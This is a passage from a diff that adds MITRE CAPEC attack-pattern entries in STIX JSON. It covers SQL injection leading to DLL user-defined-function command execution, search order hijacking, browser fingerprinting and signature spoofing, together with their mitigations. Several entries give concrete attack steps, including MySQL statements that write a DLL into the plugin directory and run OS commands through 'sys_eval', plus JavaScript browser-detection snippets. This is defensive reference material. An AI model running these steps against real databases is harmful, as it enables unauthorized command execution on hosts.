"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through.

Experiment

  1. The adversary goes about the typical steps of an SQL injection and determines if an injection is possible.

  2. Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible.

  3. If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

  4. In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \"select @@plugin_dir\"

Exploit

  1. The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \"{plugin directory}\\\\udf.dll\";

  2. Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \"create function sys_eval returns string soname 'udf.dll';\" The function sys_eval is specific to the example DLL listed above.

  3. Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \"select sys_eval('dir');\". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges.

", + "x_capec_prerequisites": [ + "A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means" + ], + "x_capec_skills_required": { + "High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection", + "id": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9147a7dc-96c2-41f7-b9c5-b3ef49dcdf38", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that the DBMS is patched with the latest security patches", + "id": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71f0bd8e-33e6-4ef2-8778-ffdf5c5609a9", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS", + "id": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48504b4a-e44a-448e-a9a2-3897cd085eda", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and 
that it runs as a separate user", + "id": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9ce000-b8ad-473e-8a4f-892b64b4c43e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not use the DBMS machine for anything else other than the database", + "id": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95f621c4-31d2-4fd4-89e2-7b69c24af990", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.", + "id": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca5847b9-62fc-42d7-8ec4-e4068cd7df27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Use an intrusion detection system to monitor network connections and logs on the database host.", + "id": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce982c38-66be-4428-a92d-ebb29735fb27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised", + "id": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7b22a10d-ca9b-4638-b525-d142e88f10e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in an application's specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary's rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. 
No forensic trails are left in the system's registry or file system that an incorrect library had been loaded.", + "external_references": [ + { + "external_id": "CAPEC-471", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow:DLL search order hijacking", + "external_id": "T1574.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/001" + }, + { + "description": "Hijack Execution Flow: Dylib Hijacking", + "external_id": "T1574.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/004" + }, + { + "description": "Hijack Execution Flow: Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "M Trends Report, 2011, Mandiant", + "external_id": "REF-409", + "source_name": "reference_from_CAPEC", + "url": "https://www.mandiant.com" + } + ], + "id": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Search Order Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\Windows directory. This DLL normally resides in the System32 folder. 
Process explorer.exe which also resides in C:\\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.", + "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target general susceptibility: An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.

  2. Techniques
    The attacker uses a tool such as the OSX \"otool\" utility or manually probes whether the target application uses dynamically linked libraries.
    The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted.

Experiment

  1. Craft malicious libraries: The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.

  2. Techniques
    The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.

Exploit

  1. Redirect the access to libraries to the malicious libraries: The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.

  2. Techniques
    The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.
    The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.
    The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38.
", + "x_capec_prerequisites": [ + "Attacker has a mechanism to place its malicious libraries in the needed location on the file system." + ], + "x_capec_skills_required": { + "Medium": "Ability to create a malicious library." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected", + "id": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2809e228-142a-488a-a2f7-22b0bdda15e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sign system DLLs so that unauthorized DLLs can be detected.", + "id": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--189e08be-aa2a-4fe1-9544-7d387f8d6fd4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. 
Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.", + "external_references": [ + { + "external_id": "CAPEC-472", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Gareth Heyes, Detecting browsers javascript hacks, The Spanner, 2009--01---29", + "external_id": "REF-410", + "source_name": "reference_from_CAPEC", + "url": "http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/" + } + ], + "id": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Browser Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following code snippets can be used to detect various browsers:\n \n Firefox 2/3\n FF=/a/[-1]=='a'\n Firefox 3\n FF3=(function x(){})[-5]=='x'\n Firefox 2\n FF2=(function x(){})[-6]=='x'\n IE\n IE='\\v'=='v'\n Safari\n Saf=/a/.__proto__=='//'\n Chrome\n Chr=/source/.test((/a/.toString+''))\n Opera\n Op=/^function \\(/.test([].sort)\n \n " + ], + "x_capec_prerequisites": [ + "Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Java Script in the browser", + "id": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-472-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ed3172-e4ba-44b6-90f3-93e92247d779", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "target_ref": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.", + "external_references": [ + { + "external_id": "CAPEC-473", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Masquerading: Invalid Code Signature", + "external_id": "T1036.001", + 
"source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/001" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.", + "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor." 
+ ], + "x_capec_parent_of_refs": [ + "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47" + ], + "x_capec_prerequisites": [ + "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.", + "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature." + ], + "x_capec_skills_required": { + "High": "Technical understanding of how signature verification algorithms work with data and applications" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-474", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/474.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Sigbjørn Vik, Security breach stopped, 2013--06---26, http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack", + 
"external_id": "REF-411", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Patrick Morley, Bit9 and Our Customers’ Security, 2013--02---08, https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/", + "external_id": "REF-412", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Brad Arkin, Inappropriate Use of Adobe Code Signing Certificate, 2012--09---27, http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html", + "external_id": "REF-413", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An authoritative or reputable signer is storing their private signature key with insufficient protection." 
+ ], + "x_capec_skills_required": { + "High": "Ability to compromise systems containing sensitive data", + "Low": "Knowledge of common location methods and access methods to sensitive data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to private keys from non-supervisory accounts", + "id": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to administrative personnel and processes only", + "id": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--af927d47-9f4f-4c35-abe7-1b27e76baf07", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all remote methods are secured", + "id": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d744a39d-65e1-4dc4-800a-54487a665643", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all services are patched and up to date", + "id": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + 